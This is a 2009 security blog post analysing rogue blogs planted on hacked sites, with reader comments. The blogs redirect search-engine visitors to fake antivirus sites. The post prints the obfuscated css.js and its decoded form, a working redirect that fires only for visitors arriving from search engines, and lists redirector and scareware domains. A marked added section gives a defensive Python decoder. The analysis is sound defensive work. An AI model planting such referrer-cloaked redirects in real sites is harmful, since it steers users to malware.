
Rogue blogs redirect search traffic to bogus AV sites. Part 1.

   26 Nov 09   Filed in Website exploits

As I tweeted a few days ago, I gathered a lot of interesting information about this case, so to keep the post readable I’ve broken it down into two parts. The first part is about how rogue blogs work; the second part is about the different generations of this black hat campaign and about the connection with the Servage hosting provider.

A few days ago, I stumbled upon a great post on the Cyveillance blog about a massive Google search results poisoning campaign. Well worth reading.

Here is a brief summary of their post:

  1. Hackers created rogue blogs in subdirectories of legitimate web sites.
  2. The blogs look like picture sites where each post is just 5 images from Google Search results for the query that matches the post title.
  3. Every blog targets an individual set of not very popular keywords (the long tail), e.g. “blue mustang picture“, “upstate ny photos“, “pictures of 2008 cadillac“, “cinderella story pictures“, “fan remote wiring diagram“, etc.
  4. The blogs are harmless if you type their addresses into a browser, but if you reach them by clicking on Google’s search results, you’ll be redirected to a scareware site that tricks visitors into downloading and installing a bogus anti-virus program (which is really a trojan).
  5. All the blogs have the same structure. And since they target Google, this search engine can be used to find rogue blogs. E.g. the search allinurl:albums/bsblog/category returns 295,000 results. Another variant, allinurl:bmsblog/category, returns 110,000 results.

When I checked the web sites I discovered a few more interesting facts about this criminal campaign.

Rogue blog architecture

All rogue sites are built on the same anonymous PHP-based blogging platform. Although it’s quite minimalistic, it supports many essential blogging features such as categories, themes, RSS feeds, and SEO-friendly URLs.

Categories: all the blogs have the same set of categories (which helps to find them using Google). E.g. coooooool, yeah, lol, great, wow, HAHAHAHAHAH, sex, free, photos, etc. Posts are usually completely irrelevant to the categories – another sign of automated content generation.

All of the (thousands of) rogue blogs use just a handful (about 10) of free blogger themes.

To generate SEO-friendly URLs they seem to be using rewrite rules in .htaccess files.

For example, bmsblog/page/276/ is actually bmsblog/index.php?page=276
and bmsblog/upstate-ny-photos/ is bmsblog/index.php?id=upstate-ny-photos

You can access them either way.

I wonder where they store data. I don’t believe it is MySQL. Probably they use flat files.

And, finally, they have one more common feature that makes them malicious: the css.js file in the root directory of each blog.

JS redirects

Hacked websites that redirect search engine traffic to scareware sites are nothing new. Most of them use server-side redirects driven by conditional rewrite rules in .htaccess files.

However, in this case, hackers decided to use client-side redirects. Every rogue blog includes a css.js file located in the root directory of the blog.

<script type="text/javascript" src="http://hacked-site.tld/subdirectories/bmsblog/css.js"></script>

This script looks like this (the script is truncated here):

var host = '104011611162112305840475047610470978114911401211045211231114116511660467099811090470';
var pid = '58s09';
var sid = '9f93bc';
function dMY(k) {    function sVJ(V) {        var s = new Array(Math.ceil(V.length / 4));        for...
dMY.apply(dMY, [unescape("%20%CFh%05%210%21%82L7%19%17%B4%2110%21N%24%DEd%924h%E6%88%D1%9C%13%E4%E5%...

When this script is decoded (thanks to jsunpack) we get:

var host = '104011611162112305840475047610470978114911401211045211231114116511660467099811090470';
var pid = '58s09';
var sid = '9f93bc';
var _host = '';
// Decode the redirect target: each group of 4 digits holds one character code.
// A leading '0' means the code is the next 2 digits; otherwise the first 3 digits are the code.
for (var i = 0; i < host.length; i = i + 4) {
    if (host.substr(i, 1) == '0') {
        _host = _host + String.fromCharCode(parseInt(host.substr(i+1, 2)));
    }
    else {
        _host = _host + String.fromCharCode(parseInt(host.substr(i, 3)));
    }
}
var url = _host+'?pid='+pid+'&sid='+sid;
// Redirect only when the referrer looks like a search engine results page.
if ( document.referrer && document.referrer != '' && (document.referrer.match(/msn/i) ||
     document.referrer.match(/live/i)  || document.referrer.match(/altavista/i) ||
     document.referrer.match(/baidu/i) || document.referrer.match(/yahoo/i) ||
     ( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) ||
       document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i) ) ) )) {
    if (top.location.replace) {
        top.location.replace(url);   // replace() leaves no history entry for the rogue page
    }
    else {
        top.location.href = (url);
    }
}

As you can see, this script redirects users only if they come from sites whose addresses contain pre-defined strings. The targets are visitors from popular search engines: MSN, Live.com (the script must be from the pre-Bing era), AltaVista, Baidu and Yahoo!. In the case of Google, they are only interested in visitors from Image Search (imgres), Web Search (search) and Blog Search (blogsearch). Google hosts many other products on the google.com domain (e.g. Reader, Analytics, forums, etc.), and the hackers want to hide the malicious redirects from users of Google’s non-search products.

Scareware sites

The host variable at the top of the script is the encoded domain of the site this script redirects visitors to. To avoid blacklisting, this string changes every day, so every day the rogue blogs redirect visitors to sites with new domain names. Here are a few of them: smile-life .cn, harry-pott .cn, firefoxavatar .cn, mozzillaclone .cn, antyspywarestore .com, flatletkick .cn, zapotec2 .cn, separator2009 .cn, solidresistance .cn, overmerit3 .cn.
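As an added example (not code from the original post or from the rogue blogs), here is a Python decoder for the host string and a reimplementation of the referrer filter from the decoded script: the first lets an analyst pull the redirect target out of a captured css.js, the second lets a site owner reproduce the exact condition (a search-engine Referer) that makes a suspected page redirect. The function names and the SAMPLE_CSS_JS text are constructed; the host, pid and sid values are the ones quoted above.

```python
import re

# Constructed sample: the three variables from the top of a css.js, with the
# values quoted in the post.
SAMPLE_CSS_JS = """
var host = '104011611162112305840475047610470978114911401211045211231114116511660467099811090470';
var pid = '58s09';
var sid = '9f93bc';
"""

def decode_host(encoded):
    """Reverse the 4-digit-group encoding of the host variable.

    Each group of four digits holds one character code: a leading '0' means
    the code is the next two digits ('0584' -> 58 -> ':'); otherwise the
    first three digits are the code and the fourth is filler ('1040' -> 104 -> 'h').
    """
    chars = []
    for i in range(0, len(encoded), 4):
        group = encoded[i:i + 4]
        code = int(group[1:3]) if group[0] == '0' else int(group[0:3])
        chars.append(chr(code))
    return ''.join(chars)

def extract_redirect_url(script_text):
    """Pull host/pid/sid out of a css.js and rebuild the URL the script would use."""
    vals = dict(re.findall(r"var\s+(host|pid|sid)\s*=\s*'([^']*)'", script_text))
    return decode_host(vals['host']) + '?pid=' + vals['pid'] + '&sid=' + vals['sid']

# Substrings the decoded script tests with /.../i; Google additionally needs
# a search-related path component.
ENGINES = ('msn', 'live', 'altavista', 'baidu', 'yahoo')
GOOGLE_PATHS = ('imgres', 'search', 'blogsearch')

def referrer_triggers_redirect(referrer):
    """Replicate the script's referrer filter. Sending a Google search URL as
    the Referer header reproduces the redirect on a suspected page; a direct
    visit (empty referrer) never triggers it, which is why the blogs look clean.
    """
    ref = referrer.lower()
    if not ref:
        return False
    # Plain substring matches, so e.g. 'livejournal.com' also passes the 'live' test.
    if any(engine in ref for engine in ENGINES):
        return True
    return 'google' in ref and any(path in ref for path in GOOGLE_PATHS)
```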

These sites (they act only as redirectors) immediately redirect people further to the actual scareware sites (e.g. antivir3 .com, antimalware-3 .com, cyber-scan008 .com, etc.), which perform a fake scan and make people think their computers are infected (displaying a Windows interface even to Linux and Mac users ;-)). Pretty much the same as what I described a year ago, with a slightly improved interface (the fake warning window is now draggable!). Don’t be fooled.

Everything on the scareware sites (warnings, fake test, downloads) works using JavaScript. If you disable JavaScript, you will only see a blank screen. Actually, you won’t be redirected in the first place since the initial redirect is also JavaScript-based.

This is another good reason to use the NoScript Firefox extension (is there something similar for other browsers?), which disables scripts on untrusted sites, rendering all the hackers’ efforts useless.

To be continued...

In Part II of this post you will read about the different generations of the rogue blogs and their evolution. It will be especially interesting to clients of the Servage hosting provider, which seems to have been affected the most.


Reader's Comments (8)

  1. [...] & please at least use NoScript. FireMobileSimulator too, if possible... Rogue blogs redirect search traffic to bogus AV sites. Part 1. Unmask Parasites [...]

  2. [...] This post was mentioned on Twitter by Denis, Joe Burton. Joe Burton said: internetcrimes.net Rogue blogs redirect search traffic to bogus AV sites. Part 1 … http://bit.ly/5LklFm computer forensics [...]

  3. [...] Read the details of the malware network at Unmask Parasites. [...]

  4. [...] more than 100,000 websites are infected, as can be read on UmaskedParasites.com among other places. A closer analysis of the malware was also carried out there. [...]

  5. Thanks for the post. Very interesting. How then does this get injected into legitimate web sites? It’s happened to 5 of my websites – some did have old WordPress, and all hosted at Servage..

     • WordPress is definitely not to blame.

       You should contact Servage and ask them to investigate this issue. Make sure to show them my articles. Especially Part 2.

       If you have saved files from those rogue blog directories, I would definitely like to take a look at them.

  6. I had a few of my Servage hosted domains hit with this. Unfortunately, I got here after deleting the files (via your P2 on a google for . I’ve got a ticket out with Servage and I’ll see whether they have a backup of them. Apols.

     If you google “stfuagowi.com”, “repeat with omitted links” and look at the second page, you’ll see plenty of the links.

  7. [...] November, I wrote about the rogue blogs, created in subdirectories of legitimate sites. The blogs were poisoning the search results of [...]